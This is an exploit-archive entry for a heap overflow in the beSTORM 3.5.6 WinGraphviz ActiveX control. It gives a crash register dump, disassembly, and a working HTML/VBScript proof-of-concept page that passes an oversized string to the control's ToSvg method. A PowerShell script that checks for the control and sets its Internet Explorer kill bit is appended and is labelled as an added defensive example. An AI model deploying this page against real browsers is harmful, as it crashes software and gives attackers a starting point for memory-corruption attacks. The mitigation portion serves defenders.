beSTORM 3.5.6 ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC

Properties

Publication date:
15.07.2012
Target:
beSTORM 3.5.6 ActiveX
Impact type:
Denial of service

Code

Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh
coolkaveh@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: Windows 7 SP1
Exploiting the Exploiters
What kind of crappy fuzzer is that?
==========================================================================
Registers:
--------------------------------------------------------------------------
EIP 01637FFB
EAX 41414141
EBX 01630000 -> 00905A4D -> Asc: MZMZ
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00000000
ESI 00000000
EBP 0013FD24 -> 0013FD34
ESP 0013FD10 -> 0013FD34


Block Disassembly:
--------------------------------------------------------------------------
1637FE9    CMP DWORD PTR [EAX+10],0
1637FED    JE SHORT 01638042
1637FEF    MOV ECX,[EBP+8]
1637FF2    MOV EDX,[ECX+10]
1637FF5    MOV [EBP-4],EDX
1637FF8    MOV EAX,[EBP-4]
1637FFB    CMP DWORD PTR [EAX],0      <--- CRASH
1637FFE    JE SHORT 01638042
1638000    MOV ECX,[EBP-4]
1638003    CMP DWORD PTR [ECX+10],0
1638007    JE SHORT 0163801B
1638009    MOV EDX,[EBP-4]
163800C    MOV EAX,[EDX+10]
163800F    MOV ECX,[EBP-4]
1638012    MOV EDX,[ECX+10]


ArgDump:
----------------------------------------------------------------------------
EBP+8    016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

============================================================================
<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object>
<script language='vbscript'>

arg1=String(2068, "A")

fuzzer.ToSvg arg1

</script>
</html>
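The CLSID in the PoC's object tag identifies the control, and the standard host-side mitigation for an ActiveX control that crashes on attacker-controlled input is the Internet Explorer kill bit (Compatibility Flags = 0x400). The following PowerShell check is added here and is not part of coolkaveh's PoC: it reports whether the control is registered on the host and whether its kill bit is set in both the native and Wow6432Node registry views, and sets the bit when run elevated with the script's own -Apply switch.

```powershell
# Added example (not from the original PoC): check and optionally set the IE
# kill bit for the WinGraphviz control named in the PoC above. Run elevated
# when using -Apply.
param([switch]$Apply)

# CLSID copied from the PoC's <object classid=...> tag.
$clsid   = '{684811FB-0523-420F-9E8F-A5452C65A19C}'
$killBit = 0x400   # Compatibility Flags bit that blocks instantiation in IE

# Native and 32-bit-on-64-bit registry views.
$compatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)
$classKeys = @(
    "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32",
    "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$clsid\InprocServer32"
)

# Is the control registered at all? If so, report which DLL backs it.
foreach ($k in $classKeys) {
    if (Test-Path $k) {
        $dll = (Get-ItemProperty -Path $k).'(default)'
        Write-Output "Registered: $k -> $dll"
    }
}

foreach ($k in $compatKeys) {
    $flags = 0
    if (Test-Path $k) {
        $v = Get-ItemProperty -Path $k -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($v) { $flags = [int]$v.'Compatibility Flags' }
    }
    $set = ($flags -band $killBit) -ne 0
    Write-Output ("{0}: kill bit {1}" -f $k, $(if ($set) { 'SET' } else { 'NOT set' }))

    if ($Apply -and -not $set) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        # Keep any flags already present; only add the kill bit.
        Set-ItemProperty -Path $k -Name 'Compatibility Flags' -Value ($flags -bor $killBit) -Type DWord
        Write-Output "  -> kill bit applied"
    }
}
```

Without -Apply the script only reports, so it can be run across a fleet to find hosts where the control is still loadable from a web page.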

